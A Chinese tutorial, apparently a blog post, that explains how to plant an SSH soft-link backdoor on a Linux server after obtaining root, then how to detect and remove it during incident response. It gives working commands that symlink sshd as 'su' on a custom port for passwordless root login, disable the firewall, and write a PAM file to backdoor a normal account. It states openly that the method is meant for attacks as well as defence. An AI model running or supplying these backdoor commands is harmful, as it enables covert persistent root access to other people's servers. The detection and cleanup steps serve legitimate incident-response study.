一、本教程作用

1、用在攻击的途径上
2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?
不知攻,焉知防

二、SSH软链接后门-教程

前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限
环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机)

在目标服务器上执行命令:

1、第一种:创建root账户 ssh软链接后门命令:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345 #ssh软链接
systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上

在这里插入图片描述
连接软链接后门测试:
此处密码可以随意

ssh root@XXX.XXX.XXX.XXX -p 12345

在这里插入图片描述

2、第二种:创建其它账户 ssh软连接后门命令
前提: 服务器存在普通账户wxg

第一步执行以下命令:
echo " 
 #%PAM-1.0
 auth       sufficient   pam_rootok.so
 auth       include      system-auth
 account    include      system-auth
 password   include      system-auth
 session    include      system-auth " >> /etc/pam.d/wxg

第二步执行开启软链接命令
ln -sf /usr/sbin/sshd /tmp/wxg;/tmp/wxg -oPort=14725

systemctl stop firewalld.service #关闭服务器的防火墙,不然连接不上

在这里插入图片描述
kali远程连接wxg账户测试成功
在这里插入图片描述

三、SSH软链接后门——应急响应发现

第一步:查看服务器开放的端口号

netstat -anpt

发现开启有12345、14725异常端口,且名字为su、wxg,且su的PID 为7702
在这里插入图片描述
查看PID 7702所使用的程序为ssh

ll /proc/7702

在这里插入图片描述
第二步:确定软链接后门文件

查看所有的su文件,以及查找具体哪一个su是软链接后门

find -name su
ll /usr/share/bash-completion/completions/su
ll /usr/local/su

在这里插入图片描述
最终确定软链接为:/usr/local/su

第三步:删除软链接后门

rm -rf   /usr/local/su
kill -9 7702

在这里插入图片描述
切记: 不要用 rm -rf /usr/local/su/,如果后面多一个斜杠,就会把文件删除!
在这里插入图片描述
软链接被成功清除,登录不上了
在这里插入图片描述
更多资源:
1、web安全工具、渗透测试工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频、都是2019-2021年期间的较新视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
在这里插入图片描述

GitHub 加速计划 / li / linux-dash
10.39 K
1.2 K
下载
A beautiful web dashboard for Linux
最近提交(Master分支:1 个月前 )
186a802e added ecosystem file for PM2 4 年前
5def40a3 Add host customization support for the NodeJS version 4 年前
Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐